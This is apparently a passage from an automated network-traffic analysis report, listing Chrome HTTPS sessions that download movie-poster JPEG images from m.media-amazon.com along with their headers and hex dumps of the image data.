                                                                                                                                                                                          2024-12-15 11:38:01 UTC1369INData Raw: 05 4e 37 09 bb 75 23 66 75 10 52 0d 02 a4 1b 77 ad 6c 4d 98 d5 41 48 35 8e 60 e9 3a c9 81 01 b3 3a 08 a9 c6 15 30 22 d9 f5 3a aa bc 01 93 6d 55 23 63 0c d9 8d c2 72 2d d8 cb 29 a2 41 48 24 ce 80 e9 d0 81 ab 1c da 75 2e 2f 0d 42 a2 70 05 8c 1c f6 35 c9 1d 07 96 af e6 1c 0c 0d 42 22 b1 83 45 ab 83 6f 4c 12 33 d8 cb 4b 83 90 48 ec 60 d1 a2 41 08 09 b0 83 45 8b 06 21 24 c0 0e 16 2d 1a 84 90 00 3b 58 b4 68 10 42 02 ec 60 d1 a2 41 08 09 b0 83 45 8b 06 21 24 c0 0e 16 2d 1a 84 90 00 3b 58 b4 68 10 42 02 ec 60 d1 a2 41 08 09 b0 83 45 8b 06 21 24 c0 0e 16 2d 1a 84 90 00 3b 58 b4 68 10 42 02 ec 60 d1 a2 41 08 09 b0 83 45 8b 06 21 24 c0 0e 16 2d 1a 84 90 00 3b 58 b4 68 10 42 02 ec 60 d1 a2 41 08 09 b0 83 45 8b 06 21 24 c0 0e 16 2d 1a 84 90 00 3b 58 b4 68 10 42 02 ec
                                                                                                                                                                                          Data Ascii: N7u#fuRwlMAH5`::0":mU#cr-)AH$u./Bp5B"EoL3KH`AE!$-;XhB`AE!$-;XhB`AE!$-;XhB`AE!$-;XhB`AE!$-;XhB
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1369INData Raw: c0 e7 92 e3 10 69 9f 94 73 b5 53 57 18 c2 4e 87 96 fd 32 1d b4 33 63 d7 17 b5 4c 51 a0 8e 01 bb 0e 2c 07 0d 22 69 f8 1e 9b 41 04 ac d8 aa ee be 59 49 79 f9 d3 4d 75 15 5c 81 e7 9a 7f 3d 1a 35 08 ea 95 f3 08 4d 0d ce a5 7d 52 d6 d5 4e 5d 69 08 3b 1d 5a 31 83 98 8d 5a 4d 0c a4 71 75 44 db 50 2f 30 e4 53 fe d4 e5 c8 15 c8 ad 1e be 14 a1 bc 04 67 55 4f 22 f3 b3 f3 25 61 10 63 8e a6 db 2f ed 93 f2 ae 76 ea 8a 43 d8 e9 50 22 06 71 b5 a5 11 a1 dc 92 07 2f 3a 8a 46 02 23 4e f0 a7 c9 b9 90 a6 b6 c0 b6 50 be ea 10 ac eb cf 4e c2 20 98 36 65 e7 69 44 d2 3e 29 ef 6a a7 ae 38 84 9d 0e b5 9b 41 ba eb ed 57 69 1b a4 8c 31 ca 26 f9 a3 a2 84 b6 8c e3 b3 e6 e8 12 a6 cd 9a 6a 34 26 6f 55 9e b8 0d 82 fa 6a 06 ab 46 fa 92 8c 7a 2a b7 45 be db e5 75 e5 21 ec 74 a8 9d 0c d2 7d
                                                                                                                                                                                          Data Ascii: isSWN23cLQ,"iAYIyMu\=5M}RN]i;Z1ZMquDP/0SgUO"%ac/vCP"q/:F#NPN 6eiD>)j8AWi1&j4&oUjFz*Eu!t}
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1131INData Raw: 64 f6 2f c5 b3 d4 6b c5 2f 2b 18 64 ea f5 e2 17 67 df 28 9e ee bf 59 fc c2 cc 9b ea e4 a1 b7 d4 49 c3 07 d4 89 23 ff 2a 7e 76 e1 dd d2 a7 7c 1a c4 2d b3 8a 49 d2 c0 20 6b ee 54 a3 99 3b d5 a6 cc 96 fc cf 27 b6 a8 9b 7b ef 56 3f c9 de 93 bf e9 e0 7d ea 46 ff 81 fc f5 fb 26 f3 1b 9a be b1 69 8f 1a 1c 86 41 fc e9 c2 ba c5 bd 6a 20 f7 a2 3a 2f fb 72 e9 ec 89 99 fc e7 75 5d af aa 2f e5 e4 fb df d4 19 7d 30 c8 22 0c e2 4b 0f f2 8e 3a b5 f7 ed e2 49 d3 30 88 ff ef d2 09 13 ba 32 8b ff 96 8e c9 1e 2a 7a b1 f4 70 84 2c 49 60 92 4d 19 f9 bc 2b 7f eb 58 1e 86 d8 aa 36 f5 dc 9b bf 61 f6 01 b5 d1 7f 30 7f fd b8 c9 da 10 bb d5 60 ff 33 85 0b 17 c5 20 cf ab 75 d9 69 75 de 00 7a 90 4a b0 bf aa ce cc be a2 be 56 e9 99 fe a1 4e 1b d5 06 29 9e 32 2b 3d 08 0c e2 8b 41 66 d5
                                                                                                                                                                                          Data Ascii: d/k/+dg(YI#*~v|-I kT;'{V?}F&iAj :/ru]/}0"K:I02*zp,I`M+X6a0`3 uiuzJVN)2+=Af


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          51192.168.2.1649780151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:00 UTC644OUTGET /images/M/MV5BMTY4MTkxOTk1Nl5BMl5BanBnXkFtZTgwNjAyODgwMzE@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:01 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 28163
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: e4c12762-6d2b-4f12-b385-3bca234bc2da
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 29 Aug 2013 04:31:50 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 18 Nov 2044 11:25:44 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 1670133
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:01 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200047-IAD, cache-ewr-kewr1740060-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 ad 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 01 03 05 01 00 00 00 00 00 00 00 00 00 00 00 08 05 06 07 00 01 02 03 04 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 00 01 02 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 30 75 e2 2a b0 32 b2 e3 ef 76 f3 3a
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"60u*2v:
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 5e 61 44 ac 16 59 49 26 18 7e 41 9e 8d 6e 0a c6 e5 76 aa aa e5 5f 1b e6 5e f5 5a 96 aa ab 95 7b 5e 49 75 5e 2a da 86 ca 96 dc 30 d4 5f 45 c3 5a 0a 50 a8 cc 9a 62 e2 3c f1 81 35 b0 d0 12 d3 a3 78 ee 63 d4 88 74 35 5d e5 ad 4c 69 dd 83 2e 2b 63 94 62 e7 48 45 3c 4b 27 45 0b ac 46 93 c3 31 35 e6 ba 1c 62 b9 4c 2d 36 9c 45 0f 4b 31 37 a8 0e ba ab db 36 e6 b7 27 00 96 ab e7 c5 da 96 8c 9d 6d 53 73 1d b5 e8 87 ae f7 bb d4 eb 7c a5 3c 79 9b 63 2e ab d6 6d a1 84 a6 f9 c6 a1 3d 72 42 56 22 4a 44 e5 1b 62 a3 9c 66 57 c6 a0 c7 2d 3a a0 3b ac 7a a7 d1 84 b5 31 8d 84 40 da c5 13 71 5c 8a d1 b5 27 c2 54 6c 24 fc b7 47 88 56 2a 44 e7 12 8d 21 42 20 79 f4 c2 d7 86 cd 01 6b 82 db 70 f1 c7 ae ce 73 96 e4 6f 2a cf 9d 42 d7 99 28 be a5 84 ad 64 7b bf 5f 2f b3 0d aa 54 71 ad
                                                                                                                                                                                          Data Ascii: ^aDYI&~Anv_^Z{^Iu^*0_EZPb<5xct5]Li.+cbHE<K'EF15bL-6EK176'mSs|<yc.m=rBV"JDbfW-:;z1@q\'Tl$GV*D!B ykpso*B(d{_/Tq
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 3c 23 a5 6a b5 60 37 be 37 ba cb 0d b9 dc ef e7 2a 84 b2 56 3b 74 ec 15 f6 4b d1 a3 c2 ee 65 5c 41 b0 b6 9c e8 47 42 b8 e3 52 8e 1c b5 16 30 ed 8d 08 32 bc 74 22 c5 1e af 3e 74 24 46 e2 47 97 d2 4a f2 6b d6 3f 27 71 7c 8e b6 ba 9b 58 46 b7 77 18 26 15 95 54 c6 66 88 8b c6 33 24 31 9a 30 86 34 de 47 ce c1 d6 15 9e c9 5a b2 db 57 58 bc 9a 33 86 e2 6c 34 b0 93 25 9d 2d 8f 40 26 43 89 66 66 1a b5 a9 51 b2 d1 74 ae 45 17 5b 09 1a 49 d6 3d 4e 45 91 41 92 fe 6a 10 66 40 bc 49 8e ae a3 2a 13 23 39 33 cb e8 a4 79 3b eb 17 93 bb 9c f6 a7 19 f1 c0 91 b7 56 65 61 b3 1a 9b 64 78 d5 f2 de 58 f8 de ea 6b 55 b6 e1 53 1d 98 6c 93 3b db 2b 96 28 c5 f2 e9 8a 1e 58 b3 d4 0a 1a a2 2c 77 97 65 97 c0 f1 be 11 1c 4c 37 02 06 0a 9a 4b ef 89 33 ab 97 37 c3 55 24 b4 e0 81 a5 e2 64
                                                                                                                                                                                          Data Ascii: <#j`77*V;tKe\AGBR02t">t$FGJk?'q|XFw&Tf3$104GZWX3l4%-@&CffQtE[I=NEAjf@I*#93y;VeadxXkUSl;+(X,weL7K37U$d
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 6d 1e 79 7c 77 89 1d c3 86 b5 f5 06 32 e5 92 29 76 6c 86 6a 92 d7 db d4 17 d5 99 65 2d 3d 6e 8c 8d 1c 8d 20 b1 0e 42 9b 5a 8d d9 10 38 3b b3 c2 fa 18 eb 26 bb 4b 6c 43 33 4c da 5e f6 24 d6 56 12 07 63 ca 04 20 62 d0 ac 27 f6 19 67 df e6 89 60 3d 84 35 60 df b9 b8 85 fd 22 5a 47 e1 83 ab 73 a7 e0 cb a5 9d f7 23 75 c3 3f 84 bc 9d 52 9b 69 ed 56 69 c7 65 b4 92 6c 3c f5 75 28 2a 5a ea 93 46 4a 78 9a 50 20 7a 7b ab 5a 11 75 00 ca 32 cb aa c9 50 e9 c8 16 63 d5 65 ac 15 6e 94 83 5a c8 d8 06 30 b5 5c 6c 03 81 34 a1 1b 30 96 72 70 38 c3 6e 16 fe c7 e8 95 ab f1 d6 6f 9a e5 af 12 6e 7c b1 d9 71 71 60 97 c5 c4 de ab 25 96 69 7e 94 79 5b d1 3c 45 1b 72 c3 98 84 fa 96 6a 61 90 c3 6e 2a ec 50 c1 b4 a8 4e 21 65 8c f3 56 82 7e 9e c8 af 57 e9 88 96 42 40 7a 86 e1 9b f5 f0
                                                                                                                                                                                          Data Ascii: my|w2)vlje-=n BZ8;&KlC3L^$Vc b'g`=5`"ZGs#u?RiViel<u(*ZFJxP z{Zu2PcenZ0\l40rp8non|qq`%i~y[<Erjan*PN!eV~WB@z
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: e8 bb 2b 33 ed 67 44 5b be d5 1b 03 5e 51 32 7c fc db f5 68 f3 30 8c f2 48 9b 27 5a 29 80 e2 7c 95 6e ac 66 3f e4 12 75 53 65 a2 67 b2 83 26 fe 18 e0 2f 25 39 9a 19 63 32 9b 21 46 67 72 2a 79 1a e7 03 43 63 29 92 19 8e 3e 8c 39 ba f2 ed 79 df 32 31 db 39 04 6f 63 e2 2e a8 c9 6c 2d d9 df 34 56 22 8e 38 86 0c ac e2 f5 e0 8d 70 cf b7 2f 22 e4 44 ae c9 fa fb b8 c1 d4 2c a8 22 6f 0b a1 31 9f 89 f0 e8 29 c3 24 00 28 05 9a e4 ca 2f a9 64 d1 03 8f 7c 0d 5e ac bb de d3 36 3e db 92 f1 c0 d5 5a c2 a0 71 5e 7b 00 a2 ac 33 d2 38 d8 6b 45 5a 93 9c b9 58 c4 6a d6 76 b9 08 35 18 49 b0 d1 8c 96 05 8b 24 2c 33 c8 c2 b1 ff 00 85 65 93 2f 9c 19 70 cf b5 27 22 fd a9 3d 14 f2 6d 52 16 e7 fb b0 5a 3a ef a8 49 6e 49 35 62 f8 a5 8d bb 13 ce 6e 2c 08 2f ca 06 f2 33 e5 27 73 69 15
                                                                                                                                                                                          Data Ascii: +3gD[^Q2|h0H'Z)|nf?uSeg&/%9c2!Fgr*yCc)>9y219oc.l-4V"8p/"D,"o1)$(/d|^6>Zq^{38kEZXjv5I$,3e/p'"=mRZ:InI5bn,/3'si
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 59 8f f4 75 c3 7e c9 72 2f da 81 d4 8c 9d 4c 7b c9 df 9d 30 df 2c 6c aa 0f ce 65 ca ce 20 27 3d eb e0 71 21 60 ab 1a b9 61 ec 4a 72 3e 2c 74 89 96 45 b5 ae 7e 4a ac ee 63 a0 0f a2 14 e8 5d 12 b6 fb 45 9d 13 fc cf f6 29 7a 84 0b 2b d9 9d 70 df b0 5c 8b f6 85 d1 12 b0 fb 44 bc 98 e3 d9 3c 6e ae df 92 9d a7 70 a7 9d 86 7f 42 19 c1 fb 58 c8 43 03 7c f9 2c a9 dc f4 e5 56 3d 80 2c af 3e 90 4b e4 a1 00 c8 da a8 b6 e8 db 74 f4 46 5b 5b 5e 52 cc 01 de 41 69 81 9d af c3 d1 99 db ec 63 5f f0 65 92 2d 59 70 df b0 5c 8b f7 c8 9d 4f 27 ca 5e 46 7d 3d 56 59 bc 44 30 d9 65 af 3a c1 be 40 64 3f f8 b2 5f d7 93 4e 71 d1 33 16 37 92 b4 b5 be 66 c3 db 39 08 98 e4 83 7c 6e 2a dc 33 ed d6 5a d5 18 89 fa d5 a0 78 bb 5e a4 76 2d 90 05 9a a7 58 b6 1f 9b 12 3a bb 2c 87 fa 2e 1b f6
                                                                                                                                                                                          Data Ascii: Yu~r/L{0,le '=q!`aJr>,tE~Jc]E)z+p\D<npBXC|,V=,>KtF[[^RAic_e-Yp\O'^F}=VYD0e:@d?_Nq37f9|n*3Zx^v-X:,.
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 02 47 b6 a8 0f 52 be f8 f1 6e 27 25 b3 59 7a b1 8c 51 4c d8 72 76 b0 3a 2e 24 6f ae ce b8 63 d8 3e 52 76 24 5d df 94 65 a2 93 d5 fd 39 88 ee 7d 1a ae 3a 3a f1 89 4d 6f 88 1d 9d c6 1b 19 09 ac 7e 7e 7c 10 6b 21 12 9b f3 3d 79 62 6c f8 98 07 5c 90 fa 32 8a df 82 f1 31 28 73 12 b1 43 d4 83 2f b1 a4 68 2d e4 64 9a 19 22 b1 66 c9 4b 0c 30 45 52 fc 31 c0 d0 4d 5a f8 55 7b 05 1c b6 a1 c8 86 b3 e1 07 59 d7 fe 2e 24 f7 23 5c 31 ec 1f 29 7b 12 2e ef ce 50 d9 a3 79 18 9c 5f 56 8a 62 7d 65 93 ec e1 43 48 f5 59 28 ba 76 25 6e 7c 3b 2b b4 a6 0a e0 6e 05 91 0d b2 f2 ab 3f 87 90 64 52 64 ca 4d fb 8f 27 ac b1 cc d5 72 20 0d f5 23 c9 07 87 78 1e e5 b0 9a 18 44 78 7d be a9 3a 75 c4 bd e1 5c 33 ec 1f 29 7b 12 2e ef ca 00 d3 e7 77 7d 7d 7c b3 fc a3 a7 da a7 f4 04 17 10 37 d6
                                                                                                                                                                                          Data Ascii: GRn'%YzQLrv:.$oc>Rv$]e9}::Mo~~|k!=ybl\21(sC/h-d"fK0ER1MZU{Y.$#\1){.Py_Vb}eCHY(v%n|;+n?dRdM'r #xDx}:u\3){.w}}|7
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: a9 7a 96 b5 d5 2e 81 05 9f 91 ea 9a 0f 4b 91 6a 75 71 24 90 c3 07 47 e8 7b cb c3 16 8f 56 e4 81 7e 05 4b 72 22 6a c7 bc 99 e9 bc 87 b4 cb a8 57 68 ca 26 a8 8e 06 0d 07 da 71 3a 74 2a 80 1f 4a 8f cf 75 aa 16 5f c7 14 4c 2c 31 98 34 c2 dd 8f 17 89 a9 59 92 6f 29 9f 4b e6 98 cc 7e 48 42 94 67 59 2b 58 8c e2 55 b0 d2 2c 20 57 b1 e3 7a ea b5 3c d2 17 14 a1 93 cf 0a e6 c7 f3 a6 cd 4f d6 4c 86 2e 3f 76 73 f0 f5 31 83 c1 0e 1b e9 f0 92 84 cf 23 95 5d 2d 8f a0 f9 35 80 4f 17 26 98 55 11 83 0f 9e 28 19 ee 56 9e bc dc 41 1c 52 89 2b cb 2c 57 07 a5 b1 11 a7 6e 39 62 55 48 23 fe 66 6c 8f f3 a6 cd 4f d6 4c 4f b0 61 39 7f a8 1b 93 14 1d ec c7 b8 c3 66 64 3d f1 d3 db 2d 85 ed 6c 92 6b 45 d5 d0 4b b0 20 64 fb 49 90 ce a0 df 9f 9b 04 a6 c2 cb 56 76 12 6e 26 5e 7b 0d c9 a5
                                                                                                                                                                                          Data Ascii: z.Kjuq$G{V~Kr"jWh&q:t*Ju_L,14Yo)K~HBgY+XU, Wz<OL.?vs1#]-5O&U(VAR+,Wn9bUH#flOLOa9fd=-lkEK dIVvn&^{
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 67 50 e0 09 ea 0f 72 2d 20 93 3a 87 69 58 ba 86 3c 10 3e 0b 35 7f c4 7a 59 31 9a 34 86 eb 42 46 d1 04 b9 14 db a5 56 4c 2d 35 1a 75 2b 37 11 89 aa 50 0a 18 e8 1d 70 d7 dc 6b ab e3 88 3c 2a c2 b9 29 e1 ac c5 83 3d 5b 58 ac ff 00 8c b3 68 68 74 6e 02 4f 40 e5 99 21 a4 d6 e5 48 fa 08 e1 0d 95 ab df e0 d9 f9 26 83 48 c8 ec ef a8 d3 e5 c3 02 d8 c4 b7 4e 0b 07 0c fb 57 71 b7 4d d5 1b c5 b6 e2 a2 40 ba bb 2a cb 6e 0a c3 0e 12 fd 8e a7 54 9f 32 19 f7 31 69 bf fc 4c 4e ba 28 a8 41 62 f5 2d 32 ce 2d 30 7d 44 d5 9c 6c 9a 6d 4f 5a 90 4e 00 8e 01 4c 9b bc 52 b5 18 09 a9 d4 da 91 5a ed 41 d8 3d 1d bb c5 52 ed 2b 54 d8 36 69 99 6b 57 98 9e 8d 85 61 c9 f0 db 44 f4 ef 9d 90 e8 ec 52 14 9d 0d a3 98 2a 62 70 3d 1d ab c9 1f 51 35 9d 92 68 fc 40 52 e4 3d fe 2e 0e 7a 67 c4 6d
                                                                                                                                                                                          Data Ascii: gPr- :iX<>5zY14BFVL-5u+7Ppk<*)=[XhhtnO@!H&HNWqM@*nT21iLN(Ab-2-0}DlmOZNLRZA=R+T6ikWaDR*bp=Q5h@R=.zgm
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 9b 95 27 15 ee b9 40 10 59 b4 2c 96 ab 30 ba 54 20 74 52 e8 19 2a 21 38 f4 ae 52 e1 f1 c6 a5 f1 91 0a ab d1 df dd 54 b6 64 7d 11 e5 55 ea d7 cd 7f ae 08 cb 35 aa 34 8a f7 fd 14 a3 04 74 52 8d 46 4a be e5 49 a2 81 19 80 a6 d2 79 51 9e 43 30 57 88 7f da b3 de 11 c8 2e ae 14 86 b9 23 1d 82 3d 53 25 a8 54 25 35 08 45 0a d1 4d ba 69 c7 c9 ff 00 fd 05 aa ea e0 18 ac d0 dd 5e 87 64 2e b1 75 27 15 40 b9 8d 38 fd 47 fe 17 65 d5 b0 75 bf c9 64 7e 97 fa 1d 17 aa cc 5c ed cc 85 dd 7b 14 ca f1 17 69 a2 63 57 2c 66 34 4d 1e ca 13 d2 e1 12 53 7e a9 b1 21 e4 2e 5c 6b 32 9b 32 06 68 72 da 0f aa d0 2e a1 7c 0d 65 9a 04 1d 55 2f ca ab c2 45 fc ed fa ec 30 92 73 d1 36 11 bb aa 6a 85 57 25 92 d4 2a c2 4a 38 a2 b4 54 22 6b 4b b4 2b 42 ba 8a 03 12 ee 8e ec 02 9b 41 1f 2b 36 05
                                                                                                                                                                                          Data Ascii: '@Y,0T tR*!8RTd}U54tRFJIyQC0W.#=S%T%5EMi^d.u'@8Geud~\{icW,f4MS~!.\k22hr.|eU/E0s6jW%*J8T"kK+BA+6


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          52192.168.2.1649782151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:00 UTC429OUTGET /images/M/MV5BZjc1OTI1N2QtYzY4OC00YzM0LWEyNWYtZWEyOTMxNTE4Yjk3XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:01 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 26188
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 02d2d4dd-b5c5-4b60-8198-7a41eb3a1414
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 28 Mar 2024 07:04:04 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 25 Nov 2044 20:53:24 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:01 GMT
                                                                                                                                                                                          Age: 322060
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000087-IAD, cache-ewr-kewr1740052-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c2 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 02 03 00 03 01 00 00 00 00 00 00 00 00 00 00 06 07 04 05 08 01 02 03 09 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec b1 00 00 00 00 00 00 00 07 83 cb 03 3e
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4>
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: f2 ab 7d 3d ff 00 2f aa 7e 91 0c 8c 29 f2 99 c1 a7 35 80 88 00 00 00 61 66 88 77 b4 a6 3a 6e f3 62 19 25 21 4a 77 26 ec fc f9 8d 7e 85 53 46 2d fd 49 cf 62 71 67 d1 f8 cc 2d 1f 3e 9e d0 f4 d4 7c 31 8d e5 13 32 e7 1e 2f 42 c0 c8 84 db d9 74 56 12 bd 5d 3b ee 79 37 cd c9 cd 99 36 99 f5 f9 cf 7d 09 85 02 b0 00 00 00 00 1e 22 d2 af 91 1c c9 f9 7d 0d ff 00 98 b6 d8 d2 50 1d 57 e4 e3 9b 3e f7 ac 22 6a 5a f2 d2 82 42 33 79 52 bb 5c f4 d3 e8 6d f8 af 2f 7d 8b d3 5c 87 d6 56 a5 65 c2 7f a7 df 9d 1e 97 9f 66 f5 85 33 78 5e da 19 a4 3a 63 8d 02 00 00 00 00 70 c5 c3 a0 9f 95 f5 f3 06 df 1c ef 7a 47 84 b7 e5 53 6b 8b 97 1b 57 b0 22 36 6c 47 14 e8 08 dc 93 c9 cb 1a cb fb 98 b8 fd 0b 66 67 a3 dc e9 85 7b d2 4a 6b 6a dc bc c7 37 95 ef 95 27 79 f3 cf 56 de da 69 26 8b 7b
                                                                                                                                                                                          Data Ascii: }=/~)5afw:nb%!Jw&~SF-Ibqg->|12/BtV];y76}"}PW>"jZB3yR\m/}\Vef3x^:cpzGSkW"6lGfg{Jkj7'yVi&{
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: e6 78 a8 04 9b 42 45 e8 44 94 72 89 8c a3 c8 fc 14 e0 d5 6c 34 42 35 0a 6e 52 98 59 76 b7 88 54 84 53 ad 2b 02 ea 7a 7e a1 8f 1b c0 e6 d3 d8 c9 e8 82 23 71 10 50 04 2e 36 8f 63 6c bc e8 56 42 7c 59 59 ab 16 6a 36 da a7 77 69 84 6d 96 02 a9 35 8e 36 be b5 69 4c b2 65 35 41 24 64 33 87 64 f5 23 f0 df ad b6 94 98 99 3b 3a df 15 e5 48 e2 a0 88 55 2e a5 b7 fb 4f 01 0c 36 9b 69 69 cb a7 bf 0f dc b5 aa c0 4c ad 1d 07 c9 30 df 4f 4f 30 fb 8a 17 0b 17 ce 34 75 44 15 83 0f 7f 62 d0 57 8d ce 52 eb 5f cb d4 55 58 e9 25 2b e5 3d 53 86 70 77 21 66 9c 96 9c 99 c4 6d da 3d f4 db 27 f9 6b 0a 17 57 76 1b b9 1e d2 ef 48 88 8c 0a f0 c0 91 9f 7c eb a2 b2 e0 3e 10 ec 7f 91 11 b7 68 03 89 b1 62 4e 1b 59 9e 68 04 73 99 c1 af 13 33 8b 0e 3b cf bd 73 81 03 26 7f 7a d6 25 00 81 e2
                                                                                                                                                                                          Data Ascii: xBEDrl4B5nRYvTS+z~#qP.6clVB|YYj6wim56iLe5A$d3d#;:HU.O6iiL0OO04uDbWR_UX%+=Spw!fm='kWvH|>hbNYhs3;s&z%
